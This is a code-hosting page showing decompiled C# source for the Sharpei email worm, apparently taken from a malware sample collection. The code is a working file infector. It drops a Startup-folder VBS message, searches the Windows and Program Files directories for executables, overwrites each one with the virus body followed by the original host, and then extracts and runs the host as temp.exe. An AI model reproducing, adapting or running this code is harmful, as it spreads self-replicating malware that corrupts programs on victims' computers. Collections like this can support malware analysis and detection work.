MalwareSourceCode/MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Sharp.cs

87 lines
3.4 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Sharp.Sharp
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Sharp
{
public class Sharp
{
private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");
[STAThread]
private static void Main()
{
StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
text.Close();
string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
Sharp.Sharp.FileSearch(fullName);
Sharp.Sharp.FileSearch(directories[11]);
Sharp.Sharp.FileSearch(directories[12]);
Sharp.Sharp.FileSearch(directories[13]);
FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
fileStream1.Seek(12288L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
}
private static void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int length = files.Length;
for (int index = 0; index < length; ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num = fileStream1.ReadByte();
fileStream1.Close();
if (num != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy(Sharp.Sharp.virname, str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
File.Delete("hostcopy.exe");
}
}
}